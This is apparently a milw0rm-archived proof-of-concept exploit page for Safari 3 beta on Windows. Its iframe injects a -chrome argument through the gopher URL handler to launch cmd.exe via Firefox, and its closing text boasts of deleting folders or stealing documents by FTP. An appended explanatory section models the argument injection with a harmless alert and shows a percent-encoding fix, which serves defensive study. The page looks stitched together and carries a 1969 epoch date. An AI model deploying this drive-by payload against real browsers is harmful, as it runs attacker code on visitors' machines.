<!--
Safari for Windows, 0day exploit in 2 hours
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
By Thor Larholm

The PoC exploit below attacks Safari by bouncing through Firefox via the
gopher URL protocol. Safari hands the gopher:// URL to Firefox, the
registered protocol handler, as a command-line argument without escaping
the double quotes embedded in it, so the attacker-controlled portion of the
URL is parsed as a separate -chrome argument that Firefox exposes. The
injected chrome-privileged JavaScript then launches
C:\Windows\System32\cmd.exe through nsIProcess, with any arguments that
have been specified in the call to the process.run method.
It is important to know that, even though this PoC exploit uses Firefox,
the actual vulnerability is the lack of input validation on the command
line arguments that Safari hands to the various URL protocol handlers
registered on your machine. As such, there are many different attack
vectors for this vulnerability; I simply chose Firefox and the gopher URL
protocol because I was familiar with them.
I hope you enjoyed the fruits of my 2 hours of labour. Please feel free
to add my RSS feed to your reader and come back again tomorrow or next
week for a fresh batch of 0day vulnerabilities :)
Cheers, Thor Larholm
-->
<html><body>
<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true,{},0);alert(process)'></iframe>
</body></html>
# milw0rm.com [2007-06-12]
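To make the argument injection concrete, here is an added example (not part of the milw0rm post, Larholm's PoC or any Firefox/Safari code) that models what a browser does when it launches an external URL protocol handler: it takes the handler's command template and substitutes the URL for %1. Everything in it is constructed for illustration: HANDLER_TEMPLATE assumes the registry-style shape `"exe" flags "%1"` (the real Firefox 2 registration differed in detail), HOSTILE_URL carries a harmless alert instead of the cmd.exe payload, and the splitWindowsCommandLine, buildCommandLineNaive, sanitizeUrlForHandler and buildCommandLineSafe helpers are mine. The tokenizer follows the documented CommandLineToArgvW backslash/quote rules but deliberately skips the `""` in-quotes special case. Naive substitution turns one URL argument into three, one of which is -chrome; percent-encoding every character outside the RFC 3986 URL character set before substitution keeps it a single argument.

```javascript
// Added example (Node.js): how an unescaped double quote in a URL turns one
// handler argument into several. Nothing here is from the original PoC.

// Constructed: a registry-style handler command for gopher: URLs. The real
// Firefox 2 registration differed in detail; the shape is what matters.
const HANDLER_TEMPLATE =
  '"C:\\Program Files\\Mozilla Firefox\\firefox.exe" -url "%1"';

// Constructed: a hostile URL in the style of the PoC above, with a harmless
// payload. The embedded double quote closes the "%1" quoting early.
const HOSTILE_URL = 'gopher://larholm.com" -chrome "javascript:alert(1)';

// What a vulnerable browser does: textual substitution of %1, no escaping.
// A function replacement avoids String.replace's "$" replacement patterns.
function buildCommandLineNaive(template, url) {
  return template.replace('%1', () => url);
}

// Split a Windows command line into argv the way CommandLineToArgvW does
// (MSDN "Parsing C Command-Line Arguments"):
//  - whitespace separates arguments unless inside double quotes;
//  - 2n backslashes + quote  -> n backslashes, the quote toggles quoting;
//  - 2n+1 backslashes + quote -> n backslashes plus a literal quote;
//  - backslashes not followed by a quote are literal.
// The "" in-quotes special case is deliberately not modelled.
function splitWindowsCommandLine(cmdline) {
  const argv = [];
  let arg = '';
  let inArg = false;
  let inQuote = false;
  let i = 0;
  while (i < cmdline.length) {
    const ch = cmdline[i];
    if (ch === '\\') {
      let n = 0;
      while (cmdline[i] === '\\') { n++; i++; }
      if (cmdline[i] === '"') {
        arg += '\\'.repeat(Math.floor(n / 2));
        if (n % 2 === 1) { arg += '"'; i++; } // escaped quote, consumed here
        // even count: the quote is left for the next iteration to toggle
      } else {
        arg += '\\'.repeat(n);
      }
      inArg = true;
      continue;
    }
    if (ch === '"') { inQuote = !inQuote; inArg = true; i++; continue; }
    if (!inQuote && (ch === ' ' || ch === '\t')) {
      if (inArg) { argv.push(arg); arg = ''; inArg = false; }
      i++;
      continue;
    }
    arg += ch;
    inArg = true;
    i++;
  }
  if (inArg) argv.push(arg);
  return argv;
}

// Hardened substitution: a valid RFC 3986 URL never contains a double quote,
// whitespace or other characters outside its allowed set, so percent-encode
// anything else before it reaches the command line. The argument then can
// never close the quoting in the template.
function sanitizeUrlForHandler(url) {
  return url.replace(/[^A-Za-z0-9\-._~:\/?#\[\]@!$&'()*+,;=%]/g,
    (c) => encodeURIComponent(c));
}

function buildCommandLineSafe(template, url) {
  return template.replace('%1', () => sanitizeUrlForHandler(url));
}

// Stand-alone demonstration.
const naiveArgv = splitWindowsCommandLine(
  buildCommandLineNaive(HANDLER_TEMPLATE, HOSTILE_URL));
// naiveArgv has 5 entries: [3] === '-chrome', [4] === 'javascript:alert(1)'
console.log('naive   ', naiveArgv);

const safeArgv = splitWindowsCommandLine(
  buildCommandLineSafe(HANDLER_TEMPLATE, HOSTILE_URL));
// safeArgv has 3 entries: the URL stays one argument,
// 'gopher://larholm.com%22%20-chrome%20%22javascript:alert(1)'
console.log('hardened', safeArgv);
```

The same tokenizer can be pointed at any handler template from HKEY_CLASSES_ROOT to check whether a URL containing `"` breaks out of its quoting; rejecting such URLs outright is an equally valid fix, since they are not valid URLs to begin with.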
Let me make this clear... We can execute arbitrary code on the PC of anyone who visits a web page. We can tell it to delete a folder, or to send us its documents via FTP...
In short... the beta is still very much a beta, at least I hope so...
This article was published on 31-12-1969 at 18:33 and filed under Security, Hacking.
0 Comments on "Safari 3 Beta for Windows and the first bug"